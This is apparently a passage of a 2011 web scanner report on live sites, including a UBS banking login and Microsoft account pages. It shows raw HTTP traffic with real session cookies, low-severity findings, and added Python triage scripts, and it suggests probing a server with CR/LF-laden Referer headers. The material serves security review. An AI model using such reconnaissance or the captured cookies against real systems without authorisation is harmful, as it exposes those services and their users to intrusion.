Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; NavLB_Www=www2.ubs.com; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309981866345:ss=1309981804815

Response

HTTP/1.1 200 OK
content-language: en
content-type: text/html;charset=ISO-8859-1
date: Wed, 06 Jul 2011 13:51:21 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
Content-Length: 32341


<html>
   
   <HEAD>
       <title>Online Services Login</title>
       <LINK href="/olsauth/public/common/js/ubs_styles.css" type="text/css" rel="stylesheet">
       <SCRIPT language="JavaScript" SRC='/olsauth/
...[SNIP]...
<!-------------------------------->                
                       <form name="loginForm" id="loginForm" method="post" action="/olsauth/ex/pbl/ubso/pl">    
                           

<!---------------------------------->
...[SNIP]...
<TD style="WIDTH: 151px" align="right" colSpan="4" height="17">
           <input type="password" name="password" maxlength="15" tabindex="2" value="" style="height:15px;width:144px;WIDTH: 144px; HEIGHT: 15px">                                    
       </TD>
...[SNIP]...

11.24. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/pfu

Summary

Severity:   Low
Confidence:   Certain
Host:   https://onlineservices.ubs.com
Path:   /olsauth/ex/pbl/ubso/pfu

Issue detail

The page contains a form (forgotUserNameForm) with the following action URL: /olsauth/ex/pbl/ubso/pfu. The form contains the following password field with autocomplete enabled: userPassword.

Request

GET /olsauth/ex/pbl/ubso/pfu HTTP/1.1
Host: onlineservices.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-language: en
content-type: text/html;charset=ISO-8859-1
date: Wed, 06 Jul 2011 14:08:00 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"


<html>
   
   <HEAD>
       <title>Online Services Login</title>
       <LINK href="/olsauth/public/common/js/ubs_styles.css" type="text/css" rel="stylesheet">
       <SCRIPT language="JavaScript" SRC='/olsauth/
...[SNIP]...
<!------------------------------->                                        
                                   <form name="forgotUserNameForm" method="post" action="/olsauth/ex/pbl/ubso/pfu">                                        
                                       

   <TABLE cellSpacing="0" cellPadding="0" width="100%" border="0">
...[SNIP]...
<TD width="50%">
<input type="password" name="userPassword" maxlength="15" value="" style="height:15px;width:144px;WIDTH: 144px; HEIGHT: 15px">                                    
                       </TD>
...[SNIP]...

11.25. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/pfu

Summary

Severity:   Low
Confidence:   Certain
Host:   https://onlineservices.ubs.com
Path:   /olsauth/ex/pbl/ubso/pfu

Issue detail

The page contains a second form (loginForm, on the same page as 11.24) with the following action URL: /olsauth/ex/pbl/ubso/pl. The form contains the following password field with autocomplete enabled: password.

Request

GET /olsauth/ex/pbl/ubso/pfu HTTP/1.1
Host: onlineservices.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-language: en
content-type: text/html;charset=ISO-8859-1
date: Wed, 06 Jul 2011 14:08:00 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"


<html>
   
   <HEAD>
       <title>Online Services Login</title>
       <LINK href="/olsauth/public/common/js/ubs_styles.css" type="text/css" rel="stylesheet">
       <SCRIPT language="JavaScript" SRC='/olsauth/
...[SNIP]...
<!-------------------------------->                
                       <form name="loginForm" method="post" action="/olsauth/ex/pbl/ubso/pl">                    
                           

<!---------------------------------->
...[SNIP]...
<TD style="WIDTH: 151px" align="right" colSpan="4" height="17">
           <input type="password" name="password" maxlength="15" tabindex="2" value="" style="height:15px;width:144px;WIDTH: 144px; HEIGHT: 15px">                                    
       </TD>
...[SNIP]...

11.26. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/pl

Summary

Severity:   Low
Confidence:   Certain
Host:   https://onlineservices.ubs.com
Path:   /olsauth/ex/pbl/ubso/pl

Issue detail

The page contains a form (loginForm) with the following action URL: /olsauth/ex/pbl/ubso/pl. The form contains the following password field with autocomplete enabled: password.

Request

GET /olsauth/ex/pbl/ubso/pl HTTP/1.1
Host: onlineservices.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-language: en
content-type: text/html;charset=ISO-8859-1
date: Wed, 06 Jul 2011 14:08:00 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"


<html>
   
   <HEAD>
       <title>Online Services Login</title>
       <LINK href="/olsauth/public/common/js/ubs_styles.css" type="text/css" rel="stylesheet">
       <SCRIPT language="JavaScript" SRC='/olsauth/
...[SNIP]...
<!-------------------------------->                
                       <form name="loginForm" id="loginForm" method="post" action="/olsauth/ex/pbl/ubso/pl">    
                           

<!---------------------------------->
...[SNIP]...
<TD style="WIDTH: 151px" align="right" colSpan="4" height="17">
           <input type="password" name="password" maxlength="15" tabindex="2" value="" style="height:15px;width:144px;WIDTH: 144px; HEIGHT: 15px">                                    
       </TD>
...[SNIP]...

12. Source code disclosure

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://onlineservices.ubs.com
Path:   /olsauth/public/common/js/olsauth.js

Issue detail

The application appears to disclose a fragment of server-side template code: the static file olsauth.js contains an <%= ... %> expression, the syntax used by both ASP and JSP (the Java-style constant name WebConstants.LOGOUT_STATUS_CODE_SESSIONEND_LOGOUT suggests JSP), inside a commented-out block. Because the expression reached the browser unevaluated, the file was served without passing through the template engine. What leaks is a class and constant name rather than application logic, which is consistent with the Low severity and Tentative confidence.

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

Request

GET /olsauth/public/common/js/olsauth.js HTTP/1.1
Host: onlineservices.ubs.com
Connection: keep-alive
Referer: https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dl
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; NavLB_Www=www2.ubs.com; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309981879305:ss=1309981804815

Response

HTTP/1.1 200 OK
content-language: en
content-length: 659
content-type: application/x-javascript
date: Wed, 06 Jul 2011 13:51:22 GMT
last-modified: Mon, 27 Jun 2011 20:36:12 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"


   //if (self != top) {                                                            
   //        top.sofReason('<%=WebConstants.LOGOUT_STATUS_CODE_SESSIONEND_LOGOUT %>')                    
   //}        

   function cancelRequest(url)
   {
       var r=confirm("If you exit this process now, your changes will not be saved."
                    +'\n'+ "Select \"OK\" to exit.");
       
       if (r==true)
...[SNIP]...
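An added example for triaging findings like the one above; it is not code from the report or from the UBS application. It scans the body of a served JavaScript file for ASP/JSP-style <% ... %> and PHP-style <?php ... ?> markers and reports whether each one sits inside a JavaScript comment (template residue the browser never executes, as in olsauth.js) or in live code. The sample is the olsauth.js excerpt quoted above, extended with hypothetical lines (the remainder of cancelRequest and a final var logoutCode line) so that the live-code case is exercised as well.

```python
"""Classify server-side template markers found in a served static file.

Added example, not from the scanner report: locate ASP/JSP-style <% ... %>
and PHP-style <?php ... ?> markers in JavaScript and report whether each
one sits inside a // or /* */ comment or in live code. Either way the file
was served without being processed by a template engine; the classification
only changes how much of the finding is worth escalating.
"""
import re

# Constructed sample: the olsauth.js excerpt quoted in the report. Everything
# after "if (r==true)" is hypothetical and not from the report.
SAMPLE_JS = """\
    //if (self != top) {
    //        top.sofReason('<%=WebConstants.LOGOUT_STATUS_CODE_SESSIONEND_LOGOUT %>')
    //}

    function cancelRequest(url)
    {
        var r=confirm("If you exit this process now, your changes will not be saved."
                     +'\\n'+ "Select \\"OK\\" to exit.");
        if (r==true)
            window.location = url;
    }
    var logoutCode = '<%= WebConstants.LOGOUT_STATUS_CODE %>';  /* hypothetical live use */
"""

MARKER_RE = re.compile(r"<%[=@!]?.*?%>|<\?(?:php|=).*?\?>", re.DOTALL)


def comment_spans(src):
    """Return (start, end) offsets of // and /* */ comments. String literals
    are skipped so that a '//' inside a string is not taken for a comment.
    Regex literals are not handled; they are rare in the files this targets."""
    spans = []
    i, n = 0, len(src)
    while i < n:
        ch = src[i]
        if ch in "'\"":                       # string literal: jump past it
            j = i + 1
            while j < n and src[j] != ch:
                j += 2 if src[j] == "\\" else 1
            i = j + 1
        elif src.startswith("//", i):         # line comment
            j = src.find("\n", i)
            j = n if j == -1 else j
            spans.append((i, j))
            i = j
        elif src.startswith("/*", i):         # block comment
            j = src.find("*/", i + 2)
            j = n if j == -1 else j + 2
            spans.append((i, j))
            i = j
        else:
            i += 1
    return spans


def find_markers(src):
    """Each marker with its 1-based line number and whether it is commented out."""
    comments = comment_spans(src)
    results = []
    for m in MARKER_RE.finditer(src):
        in_comment = any(a <= m.start() < b for a, b in comments)
        line = src.count("\n", 0, m.start()) + 1
        results.append({"marker": m.group(0), "line": line, "in_comment": in_comment})
    return results


def classify(src):
    """'none': no markers; 'residue': all markers are commented out;
    'live': at least one marker sits in executable code."""
    found = find_markers(src)
    if not found:
        return "none"
    return "residue" if all(r["in_comment"] for r in found) else "live"


if __name__ == "__main__":
    for r in find_markers(SAMPLE_JS):
        where = "comment" if r["in_comment"] else "live"
        print(f"line {r['line']:>3} {where:<8} {r['marker']}")
    print("classification:", classify(SAMPLE_JS))
```

Run against the real olsauth.js body the result is "residue": the only marker is the commented-out one on line 2. A "live" result means a template expression is reachable by executing code or is being shipped as data, and the file should be regenerated from source rather than patched by hand.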

13. Referer-dependent response

Summary

Severity:   Information
Confidence:   Firm
Host:   http://bstats.adbrite.com
Path:   /adserver/behavioral-data/0

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present. In this instance the two responses below differ only in the vsd cookie: with the Referer present it is set to a value ending in the referring host, view.atdmt.com; without it, the cookie is cleared. The referring host is therefore being written into a Set-Cookie header, so the Referer value should be treated as user-controlled input.

Common explanations for Referer-dependent responses include Referer-based access controls, Referer-based defences against cross-site request forgery, and response content (such as advertising or tracking data) that is tailored to the referring site.

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses are updated based on Referer data, then the same defences against malicious input should be employed here as for any other kind of user-supplied data.

Request 1

GET /adserver/behavioral-data/0?d=48272602;bapid=12553;uid=1030306;neg=1 HTTP/1.1
Host: bstats.adbrite.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/UMIRF_IE9_BOW_Final_InitialView_Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362027x0.066+1305478400x1093175211"; rb=0:684339:20838240:110:0:712156:20861280:1voofy6a0tk1w:0:712181:20838240:WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP:0:742697:20828160:4325897289836481830:0:753292:20858400:AG-00000001389358554:0:762701:20861280:E3F32BD05A8DDF4D5646D79640088B:0:806205:20882880:9ed3f2f2-7f5a-11e0-a07a-00259009a9e4:0; cv="1%3Aq1ZyLi0uyc91zUtWslLKMM%2B1rEnPKzHNt0wsqTG2MixKzSgxsDK0MtDJSMoyqkkvyKoqTy5IrjG0MizJqyjIsDK1MszPq1CqBQA%3D"; srh="1%3Aq64FAA%3D%3D"; rb2=CiMKBjc0MjY5NxjY6J2rHyITNDMyNTg5NzI4OTgzNjQ4MTgzMAouCgY3NjI3MDEYva3q3iYiHkUzRjMyQkQwNUE4RERGNEQ1NjQ2RDc5NjQwMDg4QhAB; ut="1%3AVZJJtoMgEEX3wtgB2KBmN4oabFCgVKIxe%2F80nn%2BS6T116z1K32iP0eONxvYwi24APRB0rDsvsuZ7Ly9y4UsDxhEU4mguoiuZJI5GEth6WKCf6%2BgB4xPtD9ru1sWpzL5hOtvJiReVh25X5Xdh44E%2BtbK7AOd0%2FtKy0Uatx8j4rXVUWM2IsgugU1PmQSMDUNOWWoXUpgggwS%2FqJuY4tFbbYEqbxDJRByBzsViFQd4GhajSK6LVodzcMffQupnioJTLq%2FBgWMKEmcTqlS0UU6o5bVNIJbmL9Rt3KSmF4V9RvhgJxTRj7r7wGsr6PgEvngpz6ab6M%2FuByy8ccm5E7AIovgPgqQ8WvqIKASJR7nqai%2FhKL%2BgiyOTiF4k5jAAdBh8nuH8pilBdzXOre%2F9joM%2FnDw%3D%3D"; vsd=0@1@4e144551@bcp.crwdcntrl.net

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: image/gif
Set-Cookie: ut="1%3AVZJJtoMgEEX3wtgB2KBmN4oabFCgVKIxe%2F80nn%2BS6T116z1K32iP0eONxvYwi24APRB0rDsvsuZ7Ly9y4UsDxhEU4mguoiuZJI5GEth6WKCf6%2BgB4xPtD9ru1sWpzL5hOtvJiReVh25X5Xdh44E%2BtbK7AOd0%2FtKy0Uatx8j4rXVUWM2IsgugU1PmQSMDUNOWWoXUpgggwS%2FqJuY4tFbbYEqbxDJRByBzsViFQd4GhajSK6LVodzcMffQupnioJTLq%2FBgWMKEmcTqlS0UU6o5bVNIJbmL9Rt3KSmF4V9RvhgJxTRj7r7wGsr6PgEvngpz6ab6M%2FuByy8ccm5E7AIovgPgqQ8WvqIKASJR7nqai%2FhKL%2BgiyOTiF4k5jAAdBh8nuH8pilBdzXOre%2F9joM%2FnDw%3D%3D"; path=/; domain=.adbrite.com; expires=Sat, 03-Jul-2021 15:39:06 GMT
Set-Cookie: vsd=0@2@4e14819a@view.atdmt.com; path=/; domain=.adbrite.com; expires=Fri, 08-Jul-2011 15:39:06 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Wed, 06 Jul 2011 15:39:06 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

Request 2

GET /adserver/behavioral-data/0?d=48272602;bapid=12553;uid=1030306;neg=1 HTTP/1.1
Host: bstats.adbrite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362027x0.066+1305478400x1093175211"; rb=0:684339:20838240:110:0:712156:20861280:1voofy6a0tk1w:0:712181:20838240:WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP:0:742697:20828160:4325897289836481830:0:753292:20858400:AG-00000001389358554:0:762701:20861280:E3F32BD05A8DDF4D5646D79640088B:0:806205:20882880:9ed3f2f2-7f5a-11e0-a07a-00259009a9e4:0; cv="1%3Aq1ZyLi0uyc91zUtWslLKMM%2B1rEnPKzHNt0wsqTG2MixKzSgxsDK0MtDJSMoyqkkvyKoqTy5IrjG0MizJqyjIsDK1MszPq1CqBQA%3D"; srh="1%3Aq64FAA%3D%3D"; rb2=CiMKBjc0MjY5NxjY6J2rHyITNDMyNTg5NzI4OTgzNjQ4MTgzMAouCgY3NjI3MDEYva3q3iYiHkUzRjMyQkQwNUE4RERGNEQ1NjQ2RDc5NjQwMDg4QhAB; ut="1%3AVZJJtoMgEEX3wtgB2KBmN4oabFCgVKIxe%2F80nn%2BS6T116z1K32iP0eONxvYwi24APRB0rDsvsuZ7Ly9y4UsDxhEU4mguoiuZJI5GEth6WKCf6%2BgB4xPtD9ru1sWpzL5hOtvJiReVh25X5Xdh44E%2BtbK7AOd0%2FtKy0Uatx8j4rXVUWM2IsgugU1PmQSMDUNOWWoXUpgggwS%2FqJuY4tFbbYEqbxDJRByBzsViFQd4GhajSK6LVodzcMffQupnioJTLq%2FBgWMKEmcTqlS0UU6o5bVNIJbmL9Rt3KSmF4V9RvhgJxTRj7r7wGsr6PgEvngpz6ab6M%2FuByy8ccm5E7AIovgPgqQ8WvqIKASJR7nqai%2FhKL%2BgiyOTiF4k5jAAdBh8nuH8pilBdzXOre%2F9joM%2FnDw%3D%3D"; vsd=0@1@4e144551@bcp.crwdcntrl.net

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: image/gif
Set-Cookie: ut="1%3AVZJJtoMgEEX3wtgB2KBmN4oabFCgVKIxe%2F80nn%2BS6T116z1K32iP0eONxvYwi24APRB0rDsvsuZ7Ly9y4UsDxhEU4mguoiuZJI5GEth6WKCf6%2BgB4xPtD9ru1sWpzL5hOtvJiReVh25X5Xdh44E%2BtbK7AOd0%2FtKy0Uatx8j4rXVUWM2IsgugU1PmQSMDUNOWWoXUpgggwS%2FqJuY4tFbbYEqbxDJRByBzsViFQd4GhajSK6LVodzcMffQupnioJTLq%2FBgWMKEmcTqlS0UU6o5bVNIJbmL9Rt3KSmF4V9RvhgJxTRj7r7wGsr6PgEvngpz6ab6M%2FuByy8ccm5E7AIovgPgqQ8WvqIKASJR7nqai%2FhKL%2BgiyOTiF4k5jAAdBh8nuH8pilBdzXOre%2F9joM%2FnDw%3D%3D"; path=/; domain=.adbrite.com; expires=Sat, 03-Jul-2021 15:39:09 GMT
Set-Cookie: vsd=; path=/; domain=.adbrite.com; expires=Wed, 06-Jul-2011 15:39:09 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Wed, 06 Jul 2011 15:39:09 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
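An added example of the differential check behind this finding; it is not part of the scanner report. It takes two raw HTTP responses captured for the same request, one sent with a Referer header and one without, discards the fields that change on every request (the Date header and cookie expiry times) and reports what still differs. A second function looks for the Referer's host inside the response, which is how the two adbrite responses above differ: the referring host is written into the vsd cookie. The two responses in the block are copied from Response 1 and Response 2 above, with the long ut cookie value shortened and the GIF body elided.

```python
"""Differential check for a Referer-dependent response.

Added example, not from the scanner report. Two captured responses to the
same request, with and without a Referer, are normalised (volatile headers
and cookie expiry attributes removed) and compared. referer_reflected()
then checks whether the Referer's host is echoed anywhere in a response.
"""
from urllib.parse import urlsplit

REFERER = "http://view.atdmt.com/iaction/UMIRF_IE9_BOW_Final_InitialView_Home"

# Response 1 from the report (ut cookie value shortened, GIF body elided).
WITH_REFERER = """HTTP/1.1 200 OK
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: image/gif
Set-Cookie: ut="1%3AVZJJtoMg..."; path=/; domain=.adbrite.com; expires=Sat, 03-Jul-2021 15:39:06 GMT
Set-Cookie: vsd=0@2@4e14819a@view.atdmt.com; path=/; domain=.adbrite.com; expires=Fri, 08-Jul-2011 15:39:06 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Wed, 06 Jul 2011 15:39:06 GMT
Content-Length: 42

GIF89a (42-byte image, elided)
"""

# Response 2 from the report, same treatment.
WITHOUT_REFERER = """HTTP/1.1 200 OK
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: image/gif
Set-Cookie: ut="1%3AVZJJtoMg..."; path=/; domain=.adbrite.com; expires=Sat, 03-Jul-2021 15:39:09 GMT
Set-Cookie: vsd=; path=/; domain=.adbrite.com; expires=Wed, 06-Jul-2011 15:39:09 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Wed, 06 Jul 2011 15:39:09 GMT
Content-Length: 42

GIF89a (42-byte image, elided)
"""

# Headers whose value legitimately differs between two identical requests.
VOLATILE = {"date", "age", "x-request-id"}


def parse_response(raw):
    """Split a raw response into (status line, [(name, value)], body)."""
    head, _, body = raw.partition("\n\n")
    lines = head.splitlines()
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers, body


def normalize(headers):
    """Drop volatile headers and the expires attribute of every cookie."""
    out = []
    for name, value in headers:
        if name in VOLATILE:
            continue
        if name == "set-cookie":
            parts = [p.strip() for p in value.split(";")]
            value = "; ".join(p for p in parts if not p.lower().startswith("expires="))
        out.append((name, value))
    return set(out)


def diff_responses(raw_with, raw_without):
    """Return the differences that survive normalisation."""
    status_a, hdr_a, body_a = parse_response(raw_with)
    status_b, hdr_b, body_b = parse_response(raw_without)
    a, b = normalize(hdr_a), normalize(hdr_b)
    return {"status_differs": status_a != status_b,
            "body_differs": body_a != body_b,
            "only_with_referer": sorted(a - b),
            "only_without_referer": sorted(b - a)}


def referer_reflected(raw, referer):
    """Headers (plus 'body' if it applies) that contain the Referer's host."""
    host = urlsplit(referer).hostname
    _, headers, body = parse_response(raw)
    hits = [f"{name}: {value}" for name, value in headers if host in value]
    if host in body:
        hits.append("body")
    return hits


if __name__ == "__main__":
    print(diff_responses(WITH_REFERER, WITHOUT_REFERER))
    print(referer_reflected(WITH_REFERER, REFERER))
```

The normalisation step is what separates a systematic difference from noise: without dropping Date and the cookie expiry attributes, every pair of responses would differ. Once the Referer host is known to land in a header, the follow-up test is to send a Referer containing CR/LF or cookie metacharacters and confirm the server rejects or encodes it.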

14. Cross-domain POST
There are 4 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.


14.1. https://accountservices.passport.net/uiresetpw.srf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://accountservices.passport.net
Path:   /uiresetpw.srf

Issue detail

The page contains a form (f1) which POSTs data to the domain login.live.com. Only the first of the form's fields, the hidden field PPSX, is visible in the truncated response below.

Request

POST /uiresetpw.srf?mkt=EN-US&lc=1033&id=75046 HTTP/1.1
Host: accountservices.passport.net
Connection: keep-alive
Referer: https://login.live.com/resetpw.srf?wa=wsignin1.0&rpsnv=11&ct=1309951117&rver=5.5.4177.0&wp=LBI&wreply=https:%2F%2Flive.zune.net%2Fxweb%2Flive%2Fpassport%2FsetCookies.ashx%3Frru%3DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cb=B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&id=75046&bk=1309951118&mkt=EN-US&lc=1033
Content-Length: 1592
Cache-Control: max-age=0
Origin: https://login.live.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

mspppostint=CcpFZF1pzFJJ35c22EExnN3DcZnRhoC6rxnyDE0w1z4L4rRIFCpyqXea8TPp7BQBhPwTisg4E%2BUO97pJuQcu5vYrjWFOFSp8G8Ba%2FSB6LD595uTlbLDuSzbJtTZEcIO%2BYxTR4dr0WyWrpjp5u6DEX6jSYwnJRudSTtiRd8rmgW2zSNkO72JClg
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 10386
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:20:05 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
PPServer: PPV: 30 H: BAYIDSPROF1D07 V: 0
Date: Wed, 06 Jul 2011 11:21:05 GMT
Connection: close

<!-- ServerInfo: BAYIDSPROF1D07 2011.06.02.00.31.45 Live1 ExclusiveNew LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA130, -- Version: 11,0,18178,0 -->
<html dir="ltr"><head><meta http-equiv="Con
...[SNIP]...
<td class="css9997"><form name="f1" style="margin:0px;" method="post" target="_top" action="https://login.live.com/resetpw.srf?wa=wsignin1.0&rpsnv=11&ct=1309951117&rver=5.5.4177.0&wp=LBI&wreply=https:%2F%2Flive.zune.net%2Fxweb%2Flive%2Fpassport%2FsetCookies.ashx%3Frru%3DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cb=B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&id=75046&id=75046&vv=1100&mkt=EN-US&lc=1033&bk=1309951265" onsubmit="javascript:o = GEId('iHIPInput'); if(o) {if(!HIPClientCheck()) {return false;} } return OnSigninSubmit(this);"><input type="hidden" id="i0326" name="PPSX" value="Passpor"/>
...[SNIP]...

14.2. https://blog.metricstream.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://blog.metricstream.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: blog.metricstream.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:404-BGD-511&token:_mch-metricstream.com-1309960802844-32266; __utma=216666762.365739093.1309960803.1309960803.1309960803.1; __utmc=216666762; __utmz=216666762.1309960803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=216666762.9.10.1309960803

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:46:21 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Pingback: https://blog.metricstream.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32336

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />
<title>MetricStream GRC Blog | Governance, Risk, Compliance and Quality Management</title>

<!-- feeds -->
<link rel="
...[SNIP]...
<div class="textwidget"><form style="border:1px solid #ccc;padding:3px;text-align:center;" action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=MetricStreamGRC', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true"><p>
...[SNIP]...

14.3. https://login.live.com/resetpw.srf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /resetpw.srf

Issue detail

The page contains a form which POSTs data to the domain accountservices.passport.net. The form contains the following fields:

Request

GET /resetpw.srf HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 1188
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:20:04 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-7de451db-9b09-4e35-8f6c-e4631fb77a69$uuid-d6a3848e-3000-4e73-b9aa-1fbbf88c0b72$uuid-bda392d9-cea9-45eb-8ed8-8becf6686968$uuid-1f6b6ccc-243c-4585-b8d9-61483ab07d76$uuid-29963a3f-5394-45f4-bae8-74e78c1fc111; path=/;version=1
Set-Cookie: MSPBack=0; domain=login.live.com;path=/;version=1
